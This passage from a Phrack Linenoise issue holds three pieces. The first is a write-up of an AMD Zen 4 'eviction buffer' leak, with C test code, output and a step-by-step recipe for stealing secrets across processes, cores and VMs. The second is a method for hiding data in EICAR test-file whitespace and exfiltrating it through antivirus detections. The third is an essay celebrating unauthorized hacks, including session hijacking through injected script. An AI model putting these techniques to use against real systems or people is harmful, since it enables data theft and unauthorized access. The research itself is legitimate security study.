Introduction | Phrack Staff |
Phrack Prophile on Gera | Phrack Staff |
Linenoise | Phrack Staff |
Loopback | Phrack Staff |
The Art of PHP - My CTF Journey and Untold Stories! | Orange Tsai |
Guarding the PHP Temple | mr_me |
APT Down - The North Korea Files | Saber, cyb0rg |
A learning approach on exploiting CVE-2020-9273 | dukpt |
Mapping IOKit Methods Exposed to User Space on macOS | Karol Mazurek |
Popping an alert from a sandboxed WebAssembly module | th0mas.nl |
Desync the Planet - Rsync RCE | Simon, Pedro, Jasiel |
Quantom ROP | Yoav Shifman, Yahav Rahom |
Revisiting Similarities of Android Apps | Jakob Bleier, Martina Lindorfer |
Money for Nothing, Chips for Free | Peter Honeyman |
E0 - Selective Symbolic Instrumentation | Jex Amro |
Roadside to Everyone | Jon Gaines |
A CPU Backdoor | uty |
The Feed Is Ours | tgr |
The Hacker's Renaissance - A Manifesto Reborn | TMZ |
==Phrack Inc.== Volume 0x10, Issue 0x48, Phile #0x03 of 0x12 |=-----------------------------------------------------------------------=| |=---------------------=[ L I N E N O I S E ]=---------------------------=| |=-----------------------------------------------------------------------=| |=------------------------=[ Phrack Staff ]=-----------------------------=| |=-----------------------------------------------------------------------=| Linenoise is a collection of artifacts that do not fit elsewhere. Short papers, corrections, brain dumps, late papers, etc..... :)) Contents
1 - Barbie Sparkles – Barbie
2 - Another use for the EICAR test file – Peter Ferrie
3 - Hacker: Apotheosis of the Marginalized – Kolloid
4 - A Hacker’s Introduction To CHERI – xcellerator
5 - High-Performance Network Scanning With AF_XDP – c3l3si4n
6 - MMIO in the Middle – b1ack0wl
7 - Shell Your Way to Network Mastery – Gabriel & Thomas
8 - Breaking ToaruOS – NOT / Firzen, Binary Gecko
|=-----------------------------------------------------------------------=| |=-------------------=[ 1 - Barbie Sparkles ]=-------------------=| |=-----------------------------------------------------------------------=| |=----------------------------=[ barbie ]=-------------------------------=| |=--------------------=[ [email protected] ]=----------------------=| |=-----------------------------------------------------------------------=| --[ 0 - Introduction For a long time, data stored in microarchitectural buffer-like structures' behaviors were believed to be strictly internal to the CPU and protected by architectural mechanisms built into modern CPUs, many of them lacking detailed public documentation. Since 2018 following Microarchitectural Data Sampling (MDS) attacks [1] the security community discovered that the contents of such buffers might be inferred or even, under the right circumstances, directly leaked using e.g., faulting load instruction or in the shadow of transiently executed flows. These techniques might allow attackers to bypass such architectural mechanisms and other hardware mitigations, e.g. buffer clearing or overwriting. Lots of such microarchitectural buffers have been documented publicly by now, as well as mitigations have been deployed on newer hardware with this new threat model in place by most CPU vendors. Unfortunately, we show that not all CPU vendors have adopted this new threat vector into their threat model, and some newer architectures are being released having such dangerous behaviors documented. In this article, we show that it is possible to observe stale data from previously evicted cache entries from an undocumented microarchitectural buffer, which we are calling eviction buffer. More specifically, AMD Zen 4 platforms might enable a malicious process to observe data that is previously evicted from a victim process, even if the same victim process has been previously terminated. Moreover, unlike most of prior data inference attacks from microarchitectural buffers, this behavior has been documented in the official “AMD Zen4 Microarchitecture Documentation” and AMD does not consider a security concern. --[ 1 - Background --[ 1.1 - Memory Types and Performance Optimizations Modern CPUs support multiple memory types that are configurable by the OS and might be configurable by the VMM. These types enforce the cache policy used. There are cacheable memory types like write-back (WB), write-through (WT), and write-protect (WP), and uncacheable memory types like uncacheable (UC) and write-combining (WC). The standard page created by the OS for userland applications are WB, which allow values to be cached and are written back to the memory when there is bandwidth for it and the memory in case is not being actively used and updated. --[ 1.2 - Write-Combining Write-Combining (WC) is a memory performance optimization technique, which allows for the combination of multiple write operations into a single transaction, which can then be written to memory in a more efficient manner, reducing the number of bus requests required for the write operations. For this, the CPU keeps the modified data of all store operations to a specific cache line in an internal buffer, until the data can be committed to the memory. Then, the data is flushed from the buffer and committed to external memory. We also note, the __Software Optimization Guide for the AMD Zen4 Microarchitecture (ver. 57647, from January 2023)__ describes in 2.13.3 Write Combine Buffers the improvements to performance made using their aggressively combined write buffers. --[ 1.3 - Microarchitectural Buffers Lots of different microarchitectural structures are used in modern CPUs to store data in-transit. Many of such structures have been publicly documented and some of them have been even reverse engineered. At the same time, there are several prior research exploring the leakage or inference of data from internal CPU buffers, include Fallout [2], Zombieload [3], and RIDL [4]. Each of such attacks target a different buffer, e.g. store buffers, load buffers, and fill buffers. Since the security community identified such behaviors, mitigations have been deployed on newer hardware having in mind that such buffers should also be treated as containing assets in their threat model. In this work, we have identified an undocumented microarchitectural buffer, which seems to be handling previously evicted cache entries, when such entries have been tagged as belonging to uncacheable memory. We are calling this undocumented microarchitectural structure the _eviction buffer_. --[ 2 - barbieSparkles At the high-level, barbieSparkles may load data from unintended evicted cache entries from the eviction buffer after we change the memory type to WC. We were able to see this behavior bypassing context boundaries such as cross threads, cross cores, and even VM host to guest. --[ 2.1 - Eviction Sets A precondition for barbieSparkles is that the attacker is able to evict cache entries from the victim process. There is numerous research in this area, ranging from reverse engineering cache sets to a more brute-force style. --[ 2.2 - Memory Type Change Normally, only OS and VMM software have permissions to change the memory type of a specific page. For our proof-of-concept, we use the PTEditor library [5]. PTEditor is a library that enables modification of page-table levels, change memory types, and other memory manipulation actions through user level APIs provided by a Linux Kernel Module. --[ 2.3 - First Sparkle Our first sighting of a sparkle occurred by chance, and it was unexpected. We wanted to check if we can modify the memory type from cacheable memory and validate a cache poisoning behavior. There are many reasons why a modern CPU invalidates and poisons cache lines. And if one is playing with memory types, why not just check also uncacheables one? And there it was, when changing the memory type of a process from a cacheable one to WC. Following the first time spotting it, we began our research by implementing various tests which could give us one or more insights on what and why it was happening. The first test was not perfect:
// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;
We could see some sparkle, but it wasn't clear where and why:
(...)
result targetsrc val: 0x0, access time: 1440
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 675 // the stale value
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42, access time: 495 // the secret value
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 1485
result targetsrc val: 0x0, access time: 540
(...)
So, we went for more statistical testing. Running the code 100 times in a loop of 512 iterations, we would get from 1 to 2 digits hits on the secret. This isn't enough though. If we can see data that isn't supposed to be there, then we want to see it all the time, right? --[ 2.4 - I See Sparkles EVERYWHERE From there, we started to check different contexts, trying to figure out from where the leakage was coming from. We decided to test if we could leak cross threads in hyperthreading system. Check the pairs:
$ cat /sys/devices/system/cpu/cpu*/topology/thread_siblings_list
0,8
2,10
3,11
4,12
5,13
6,14
7,15
1,9
And we test two siblings:
$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 1440
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
(...)
$ ./barbiesparkles -c 10 -s 41414141 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 630
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x8, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
(...)
This shows that whatever buffer we are leaking from, it is shared within the core at least. Next step, can we leak cross-core?
$ ./barbiesparkles -c 2 -s 43434343 -n 512 -I 100 &>/dev/null
$ ./barbiesparkles -c 3 -s 44444444 -n 512 -I 100 | grep result
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 585
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 495
(...)
Huh, so our buffer is shared across all cores? Nice! We also observe that we still have some hits for the value we store in the targetsrc (0x33333333), even if it is a lower hit rate than the secret value. To force the architectural value to be committed, we flush the cache before we change the memory type:
// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Evict the cache
flush(buf_targetsrc);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;
With that, we now have actual 100% hits on the architectural (0x33) value. This seems deterministic enough to me.
$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 540
(...)
But remember that we were reading the data AFTER changing the memory type to WC, which assumes that the data shouldn't be present in the cache anymore. Just to be sure that we are seeing the current architectural value of targetsrc, we overwrite it with 0x11 and re-run the tests:
// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Evict the cache
flush(buf_targetsrc);
// Overwrite buffer with a dummy value
memset(buf_targetsrc, 0x11);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;
... and nope. What we are seeing isn't the architectural value - it is the evicted stale value:
$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x33333333 | wc -l
100
And again, 100% of the hits. Even if we flush the targetsrc buffer (with value 0x33) and overwrite it with the new value (0x11) we still get 100% hits on the value 0x33. We have in place stale data! To confirm that we are seeing only evicted data, we flush it right after overwriting it with 0x11 or after changing the memory type (it doesn't seem to matter at all) and re-run the test:
$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x11111111 | wc -l
100
--[ 2.5 - Finding The Sparkles Source We started the obvious tests, for example, we mapped the secret buffer pages to the same physical page and that gave us, zero, nada hits, confirming that this wasn’t leaking due to a stale TLB entry. After tons of such tests, we realized we don’t actually know the microarchitectural structure where the is leak coming from, so we are started calling it the “eviction buffer”. To leak the stale data, there must be a full physical address tag hit on the eviction buffer. We wrote a PoC for this behavior by tracking the physical memory address throughout the tests and then matching the secret addresses with their respective tags. To get the physical address, we used PTEditor built-in function ptedit_pte_get_pfn, which returns the – as you might expect – the page-frame number. --[ 3 - Sparkle PoC Recipe If you want to see your Zen4 platform sparkling for yourself: 1. Create two processes – one is the victim, one is the attacker. a. The victim allocates a memory buffer and writes a secret value to it. Then, the victim overwrites the secret in memory, frees the allocated buffer, and exits (yeap, the process doesn’t need to be running)! b. The attacker allocates memory in order to reclaim the same physical pages previously used by the victim to write the secret. You can choose your own version for this – allocating tons of memory is legit :) 2. The attacker marks the reclaimed memory as WC and flushes the TLB (making sure that the TLB entry is up-to-date). 3. The attacker reads the memory and gets the secret – all sparkling! Serving options: - Overwrite the secret in the victim and terminate the victim process: The attacker is able to leak the secret even if the secret value was previously overwritten architecturally. - Run the victim and the attacker processes in the same core (sibling threads), in any neighboring core (in the same CPU), or leak between host and guest virtual machine. - Try it out mixing and matching domains, e.g., VM host and guest --[ 4 - Reading the Funny Manual It is important to note before we let you go that the __AMD64 Architecture Programmer's Manual Volume 2: System Programming__ (https://www.amd.com/ system/files/TechDocs/24593.pdf) actually documents that we should not play and switch between cache policies of a specific physical page, quoting:
7.8.7 Changing Memory Type
A physical page should not have differing cacheability types assigned to it
through different virtual mappings; they should be either all of a
cacheable type (WB, WT, WP) or all of a non-cacheable type (UC, WC).Otherwise, this may result in a loss of cache coherency, leading to stale
data and unpredictable behavior.
So, please you all behave, and follow the manual – otherwise, there will be sparkles. --[ 6 - References [1] Intel Corp. (2021-03-11). "Microarchitectural Data Sampling." [2] Minkin, Marina; Moghimi, Daniel; Lipp, Moritz; Schwarz, Michael; Van Bulck, Jo; Genkin, Daniel; Gruss, Daniel; Piessens, Frank; Sunar, Berk; Yarom, Yuval (2019-05-14). "Fallout: Reading Kernel Writes From User Space" [3] Schwarz, Michael; Lipp, Moritz; Moghimi, Daniel; Van Bulck, Jo; Stecklina, Julian; Prescher, Thomas; Gruss, Daniel (2019-05-14). "ZombieLoad: Cross-Privilege-Boundary Data Sampling" [4] van Schaik, Stephan; Milburn, Alyssa; Österlund, Sebastian; Frigo, Pietro; Maisuradze, Giorgi; Razavi, Kaveh; Bos, Herbert; Giuffrida, Cristiano (2019-05-14). "RIDL: Rogue In-Flight Data Load" [5] Michael Schwarz. PTEditor. https://github.com/misc0110/PTEditor |=-----------------------------------------------------------------------=| |=------------=[ 2 - Another use for the EICAR test file ]=--------------=| |=-----------------------------------------------------------------------=| |=---------------------=[ Peter Ferrie (qkumba) ]=-----------------------=| |=-----------------------------------------------------------------------=| X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* The EICAR test string, right? 68 bytes CRC32 6851cf3c MD5 44d88612fea8a8f36de82e1278abb02f SHA256 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f Right? Right?? No. It's actually X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* followed by up to 60 bytes of restricted white-space characters. The allowed white-space characters are Space Ctrl-Z Tab CR LF So? What if... Space = 0b, Ctrl-Z = 1b, 60 bits per file, 7.5 bytes EICAR is now a steganography vehicle Maybe a bit fancier Space %*1*00000 Ctrl-Z %0*1*1010 Tab %00*1*000 CR %001*1*01 LF %0010*1*0 All five characters have one bit in a unique position Four bits in a nibble, decoder becomes simpler 60 bits is not enough? Space = 0b Ctrl-Z = 1b Tab = 10b CR = 11b 120 bits per file, 15 bytes But wait! There's more! Any subset of the five characters can represent the zero bit The rest can represent the one bit EICAR as *OLIGOMORPHIC* steganography vehicle! "hello world" (*) 0D200A080D080A1A081A0A1A1A0A080D201A0D0808201A1A201A1A202020200A 1A20200D201A1A2020080D1A08081A200A0A080D1A0A0D SHA256 6a154634b1be7df212863e486b2b1d0cb842e72c3baef941b1054e50fc08b993 (*) 5-bit text-encoding, one special character; tab/cr/lf=0, space/ctrl-z=1 Or "hello world" 08200A0D0A0D081A08200A1A1A0A0A0A20200D0D08201A1A201A201A201A2008 1A1A1A0D2020201A20080820080A1A20080A0A0D20080D SHA256 f982fa69f04053060d82aece78df2dbf10b2fcf86e842ffe44fbc287f4f4b92c Or "hello world" 0A200D0A0A0D0D1A0A1A0A1A1A080D0D20200A0D0D1A201A1A1A1A20201A1A0D 202020081A1A201A1A0D08200D0D1A1A0D080A081A0D08 SHA256 09258537fe9ea0105831873c4fbe8d000e54491fdfe446d7d353544c7b4cf334 The encoder
s=[" ","\x1a"," "]
c=["\t","\r","\n"]
t=""
for(x=0;x<text.length;x++) {
q=text.charCodeAt(x,1)&31
if(!q)q=31
for(b=32;b>>=1;)
t+=((q&b)?s:c)[Math.floor(Math.random()*3)]
}
return t
Multiple EICAR files mean more data File naming can define data ordering 1. Create the files on disk 2. Trigger a scan 3. Detections will include the unique file hash The *anti-malware engine* will leak the data The files never have to leave the disk Noisy? Yes But it only has to work once
|=-----------------------------------------------------------------------=| |=-----------=[ 3 - Hacker: Apotheosis of the Marginalized ]=------------=| |=-----------------------------------------------------------------------=| |=----------------------------=[ Kolloid ]=------------------------------=| |=-----------------------------------------------------------------------=| --> 01: Introduction Much like Phrack, I will soon be entering into my 40s. I'm at that stage where I'm reflecting on the rebelliousness of my youth, wondering what it all meant. Some of it brought financial gain, such as the time I found a legitimate exploit that allowed me to win a Mercedes-Benz C-Class. Some of it helped me along my career path, like when I used various social engineering techniques to gain escalated privileges within a Fortune 500 company, enabling me to become a data scientist and submit a patent in applied machine learning despite having no prior experience in the field. Some of it led nowhere at all, like when I discovered a glitch in my stock broker's trading platform that allowed me to borrow over $200K at a negative interest rate until my account was promptly disabled when the risk management team realized what I had done. Although I fondly reminisce on these events, it's not the outcomes that I find particularly meaningful. Instead, it's what those acts reveal about myself that gives me the greatest meaning: they show that I'm a hacker. For the longest time, I was hesitant to call myself a hacker. I felt insecure in that identity because I wasn't using rootkits to gain access into systems. I didn't use Linux. I didn't even have a compiler to make executables. Instead, I made simple tools from the resources available to me (i.e., the default programs installed on Windows XP). I mainly worked out of Notepad in my early years, using JavaScript as my language of choice. I would do things like paste the decoded Base64 binaries of cookies from two different accounts into two different instances of Notepad, flipping back and forth like an animator flipping between pages to identify bit changes. Or I would use frames to pass credentials through the URL, iterating with a script through an array on a timer to visually inspect five frames at a time if any combination in my list would grant me access. Since I wasn't using a "real" programming language, I felt lesser, even though my tools and techniques still enabled me to get what I was seeking and were things made for myself. Although I did not appreciate it at the time, my janky tools made in Notepad represented the very essence of what made me a hacker. In one form of the definition, a hack is something roughly and hastily done. It is the antithesis of something refined, so it is on the frontier, retaining some uncivilized wildness to it. On the frontier is where we find the hacker, moving the boundaries of society by pushing the system beyond its intended bounds, kicking and screaming all the way into new, unknown territory. In that sense, the hacker is the modern-day embodiment of the mythological trickster figure whose subversive acts keep society lively through the amusement and chaos he brings. I could not fully embrace my identity as a hacker until I first understood the archetypal role the hacker represented and the mythology I was living out. "The best way to describe trickster is to say simply that the boundary is where he will be found--sometimes drawing the line, sometimes crossing it, sometimes erasing or moving it, but always there, the god of the threshold in all its forms." - Lewis Hyde, Trickster Makes This World --> 02: The Myth of Hermes "If my father will not give me honors, then I will steal them." - Hermes In "Trickster Makes This World," Lewis Hyde retells the story of Hermes, who is the son of Zeus, king of the gods, and a cave nymph by means of an extra- marital affair. His questionable birth makes it uncertain if he will become recognized as a god as well. He was born with the stain of illegitimacy but born undeniably exceptional, pointing to his divine ancestry, even if it could not be explicitly stated aloud. He was also born with a certain impulsiveness, so he decides as a day-old baby to steal fifty head of cattle from his half-brother Apollo, claiming that he was hungry for something more substantial than the milk he was given. In doing so, Hermes displays his craftiness by walking the stolen cattle backward and by wearing special sandals he crafted himself to obscure his footprints. When he got back, he slaughtered and cooked two of the cattle but did not eat the meat. Instead, he hid it away and climbed back into his crib. When Hermes' mother, Maia, discovers what he has done, she questions him by asking how he could be so shameless to do such a thing. Hermes first denies the accusations by saying, "I am just a little baby. How could I possibly have stolen these cattle?" Maia, who sees through her child's attempt at deception, questions Hermes again, who laments in frustration, "Why must we live in this cave when the other gods live on Olympus enjoying the fruits of sacrifices? If my father will not give me honors, then I will steal them." Apollo eventually notices that some cattle from his herd are gone and also somehow already knows that it was the newly-born Hermes that took them. Apollo tracks down and questions Hermes, who once again responds with, "I am just a little baby. How could I possibly have stolen your cattle?" Apollo threatens to throw baby Hermes into the depths of Tartarus if he does not give him his cattle back, but Hermes does not relent to Apollo. Since neither would concede, Hermes declares that Zeus must judge who is right. So Apollo drags Hermes up to Olympus to plead his case before their father, telling Zeus of all the cunning details of Hermes' theft that he discovered. For a third time, Hermes proclaims, "I am just a baby. How could I possibly have stolen those cattle?" Zeus is amused at the audacity of the theft and the steadfastness of Hermes' denial, even when caught. So, Zeus begins to laugh. Surely, this is the son of Zeus. Rather than punishment, Zeus orders Hermes to make amends with his brother and show him where the cattle are hidden, revealing his tricks. On their way to the hiding spot, Hermes begins to play the lyre (which he also invented using the shell of a tortoise he killed while on the way to steal the cattle), and Apollo becomes enchanted by its sound, never hearing music before. When they finally reach the missing cattle, Hermes gives the lyre to Apollo as a gift. In return, Apollo gives the cattle to Hermes and a whip to symbolize his now legitimate ownership of them, and the two become friends from that point forward. Hermes is a god of paradoxes, for he is a paradox as well. How is it that Hermes could be the illegitimate son of Zeus, the king of the gods? How could the most legitimate of all the gods produce anything illegitimate? Just by existing, Hermes is a challenge to the order of Olympus, causing trouble on his first day being born. So he lies by saying, "I am just a little baby," but it is a lie that forces others to acknowledge the truth that he is more than just a little baby. He begins to unwind his own paradox. He lures others into engaging with it. If he was just a baby, then he could not have stolen those cattle. If he was something more, then they must admit that he should be elevated, deserving of praise instead of shame. Somehow, through initially stealing those fifty head of cattle, Hermes became recognized as being their rightful owner. Coincidentally, he also ended up on Olympus in the presence of his now delighted father, a place he was never meant to be. An illegitimate act set into motion the process of being recognized as legitimate. Things worked out for Hermes, but one does not always receive honors, even if the things of gods are successfully stolen. Sometimes, the gods are not amused. Sometimes, you are thrown into Tartarus. --> 03: Tartarus From My First Major Hack When I was fifteen, I learned through my biology teacher about a website that offered weekly prizes of up to $500 in gift certificates for winning trivia quizzes. After about two hours of repetition for each quiz, I became fast enough to win by recognizing the questions and their answers by the shape of the text and the first few words. The purpose of the website was to promote learning, but the quizzes ended up becoming just a reflex test. I had to answer each question in a second or two, far below the amount of time to even fully read the question. Regardless, I was able to win through the intended means. I could do what I was supposed to do. However, it wasn't sustainable because my vision would go blurry after a few hours of intently staring at my CRT screen flickering at 60 Hz. There had to be a better way that didn't end with me going blind. As I was lying in bed one evening, a thought came to me: Maybe I could modify the cache file that contained the answers by overwriting the individual characters within the file without changing the overall size of the file. I regularly went through the Temporary Internet Files folder that held the cache for Internet Explorer, so I already discovered the file that contained the answers. Still, I was never able to successfully run modified cache files before. I wondered if there might be some internal validation that checked if the file was the same size as when it was initially downloaded before it ran in Offline Mode to ensure the file had not been corrupted. So, I got out of bed to give it a try, and this time it finally worked! I now had the ability to change websites (at least how they interacted with me) in any way I saw fit, giving me something I was never meant to have. I would clear my cache, run the quiz once online to download the necessary files, switch to Offline Mode, modify the cache file so that the answers would always show up in the same location instead of a randomized one, retake the quiz, and click on "Yes" when my browser would ask if I wanted to leave Offline Mode when it tried to submit my scores back to the server. This technique worked perfectly, except when I would replace a character with a line return, so I just avoided using them when I modified my files. I would use the same technique later on to spoof file requests to sites that blocked ones from outside of the domain (especially useful for downloading multipart RAR files when paired with a download manager). I found that I could reorder things meant to be difficult to be easier for me so that I no longer needed to sacrifice myself in the process to get them. There was a leaderboard on the site, so I saw that there was one other student who figured out the same trick as me because we were far faster than anyone else. Curiously, my first major hack was the only time I spotted another hacker in the wild. The moment I found myself, I also found another like me, and it was the two of us competing against each other. The rest of the world just fell away. We formed a new game while everyone else blissfully imagined that they were still participating in something that no longer existed. Unfortunately, my downfall began the moment the gift certificates began to arrive. It was real, and I couldn't contain my excitement. I imagine that it was the same feeling as when a child first discovers that he can count to 100, overflowing with pride. I had this new ability that brought tangible rewards, and I began to share the news with my family. However, the response was not what I expected it to be. Instead of being met with amazement and congratulations, I was met with disappointment. I was told that what I was doing was wrong and that I should stop immediately. So, I quit and hid my newly discovered talent in shame. I suppose that such an experience is just a rite of passage for the hacker, but I had no one to acknowledge the virtue of such actions. I was not recognized, so I became invisible. I was thrown into Tartarus. --> 04: Olympus - Finally Being Seen In my sophomore year in college, I got a job as a software quality tester for a startup after hearing about an opening from a friend who also recently got a job there. I thought it would be exciting to be a part of the Web 2.0 boom, but the job ended up being pretty boring. The entire role was to follow a premade checklist and ensure that everything was functioning as documented. The icon is blue. Check. The icon turns green when clicked. Check. I thought my technical skills would be useful, but this role required no skill at all. This job was monotonous, and I quickly began suffering from the lack of stimulus. Boredom is a very real form of suffering. I desperately needed something to happen, some randomness, so I began looking for something to break under the guise of "quality assurance." Soon, I found something. I would make something happen. As was common at that time, the front page of the site said that it was in beta and had a contact form to join the list for the test release. I wondered if the form sent an email or if the submissions were stored in a database. What would happen if I sent a flood of requests? Something would happen, and I would gain some new knowledge of what was going on in the backend. The anticipation of discovery through a bit of mischief was the breath of fresh air I needed. Maybe I would get fired, but this role was already dead to me, so it was worth the risk. On the Friday before I left work, I placed a stapler on my enter key to continually resubmit the form over the weekend and turned off my monitor. When I got back on Monday, my boss learned what I had done and pulled me aside. He told me that I had overloaded the email server to the point where it started smoking (I'm not sure if that was literal or not). So, I now knew that the form did send out emails, which did indeed mean it was more vulnerable to attacks like the one I just pulled off with a common office stapler. Strangely, I didn't get fired or even reprimanded. Instead, my boss started to tell me about how he used to frequent the old BBSs when he was younger. He was once a hacker from a bygone era and was trying to tell me that he saw me for who I truly was: a hacker like him. I was seen, but it was not with the usual malice I encountered in school when I was younger. I was seen for the qualities that my boss cherished about his younger self and maybe even for ones that he felt were lost somewhere along the way. That recognition was transformative in many ways. Instead of punishment for my actions, my boss gave me a raise and a new title of "software security tester." My role within the system was made anew into something that conformed to who I was instead of being made to conform to something I wasn't. I was allowed to be myself because I was finally seen for who I was, and it was seen as good instead of bad. Most importantly, I was granted the official freedom to create and run my own tests, as opposed to the liberty that I took for myself. Like Hermes, the thing that I stole somehow became legitimately recognized as mine. A job that was inherently lacking creativity was transformed into one of the most creative periods of my life. It was at this job where I used a Base64 encoder/decoder I created in JavaScript to get into other accounts by changing the binary in two locations of the cookie. After the developers updated to use sessions, I worked my way up to creating a special email that sent me the session information when users opened it. The web app didn't strip out embedded scripts, so I was able to hijack its functionality to access the cookie and send it to me in an email. My time there became a game of cat and mouse with the architects, transcending the original purpose of simply testing the software. Still, the unintended byproduct of that game was better software. Things could have gone drastically different for me, and they did for my friend who introduced me to the company. Frustrated with the tedium of the job, my friend also destroyed some equipment by ripping out keys from his keyboard one day. I was promoted when I destroyed a server, but my friend ended up getting fired when he destroyed his keyboard. Two seemingly similar actions stemming from the same place of discontentment but yielding two completely different outcomes. It's like the story of Cain and Abel, where both brothers offer up a sacrifice. One is looked upon favorably by God, while the other is not, and it's not entirely clear why. If anything, I should have been punished more severely for my more severe transgression, but I was elevated to be something I wasn't before. --> 05: The Uncertain Fate of the Trickster Trickster mythology speaks to the question of how one born into the world marked as illegitimate, cut off from the good things of society, becomes legitimate. The answer is that he tricks his way in. He does something that he was not supposed to do, so he ends up passing through where he was meant to be excluded. Sometimes, he succeeds. Sometimes, he doesn't. Yet, he is a trickster because he does what he ought not to do. Often, that trick is exclusively for his own amusement, seemingly without forethought of the potential consequences of his actions. He pushes buttons just to see what will happen. Strangely, that impulsiveness will just as often result in a gift to the world by stumbling across new wonders never before seen, driving the culture forward. The hacker is the modern incarnation of the trickster, finding ways to pass through boundaries; some meant to keep him in, some meant to keep him out, and some not meant for him at all. He does not necessarily break the rules; he just doesn't do what is expected. The hacker is considered a trickster because he then finds ways to trick the various systems of this world into doing the unexpected as well. Even the machine, a symbol of utmost reliability, can be made to do something unintended. Yet, the machine does not just arbitrarily decide to rebel. The machine yields to the calls of the hacker because the hacker is firstly the one who sees something overlooked in the machine. There is hope in that moment. There is potential. The machine is first seen for what it could be, then it becomes...something new. Just as the machine receives a call for disobedience, so does the hacker: a call to the wild, a call to adventure. One mirrors the other. The hacker yields to that call because it also resonates on a deeper level than the standard protocols telling him how to operate. The seeming impulsivity of the trickster may just be giving over to that call, contrary to all the voices telling him otherwise. Much like the machine, obedience to that call transforms the person in the process, enabling him to do something he was not meant to do by getting the machine to do something it was not meant to do. Both are corrupted, but both are transformed. The hacker is simultaneously a corruptor and a liberator because he lingers in the liminality between worlds, capable of falling into several different fates. As a trickster, Hermes' fate also dangled between being thrown into the abyss or being accepted into the pantheon, and the seemingly arbitrary factor that made the difference was that Zeus was amused by Hermes' antics. I have known both the shame of being thrown into Tartarus and the elation of being raised to Olympus. I have experienced two entirely different fates in response to expressing myself through two hacks with the difference being that I found one who was amused with my antics, lifting me out of my shame and elevating me to be something more. Sometimes, we are honored. Sometimes, we are not. True validation is from the phenomena we produce when the system recognizes us through obedience to our instructions. Regardless of the often arbitrary response of society, you can be confident that even in small acts of defiance, you are reenacting the mythology of the trickster that makes this world. You are a hacker. "Here you will live a life of danger. Creativity. Perhaps not a respected life, but certainly an interesting one." - Joseph Campbell --> 06: Acknowledgements I want to thank Brian Takle, who first introduced me to the concept of the hacker as a trickster through his essays on The Matrix series. Many of his ideas have been floating in the back of my mind for the past 20 years, helping me to link the phenomenological to the mythological.
